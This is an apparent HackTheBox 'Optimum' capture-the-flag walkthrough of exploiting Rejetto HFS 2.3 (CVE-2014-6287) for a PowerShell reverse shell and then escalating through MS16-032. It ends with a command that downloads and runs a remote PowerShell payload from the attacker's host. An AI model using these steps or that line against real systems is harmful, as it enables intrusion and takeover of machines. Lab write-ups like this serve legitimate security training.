HackTheBox - Optimum

Nmap scan (Basic and all port)

All port scan gave us the same results, so our main intention is to lookout at port 80 (HTTP Server)

Website Surface Testing

Looks like the website is running Rejetto HTTP File Server. There was a known vulnerability for this specific version. Version Running: HttpFileServer 2.3

We can use searchsploit or can even use google to checkout the vulnerability.

CVE-2014-6287 (Exploit)

From rejetto wiki. Also known as template macros, these are commands with some useful effects that users can input in HFS to improve a template or to create functionality not otherwise available.

References: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
https://www.exploit-db.com/exploits/39161

Manual Exploitation

The search parameter is vulnerable and we can write HFS script to get Remote Code Execution.

We get a ping request back, that means we can have RCE. Let's try to get a reverse shell using powershell. We will use nishang's Invoke-PowershellTCP.ps1 script to get a connection back.

Github link: https://github.com/samratashok/nishang/tree/master/Shells

Note : Make sure to URL encode the payload.

Running Sherlock.ps1 (By Rastamouse)

Github Link : https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1

So the system looks vulnerable to MS16-032 Secondary Logon Handle Privilege Escalation. We can get the script from exploit.db but Empire already has a modified script and we can use that.

MS16-032 Exploitation (Secondary Logon Handle Privilege Escalation)

Add the following line of code at the end of MS16-032 script and edit it according to your need.

Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell2.ps1')"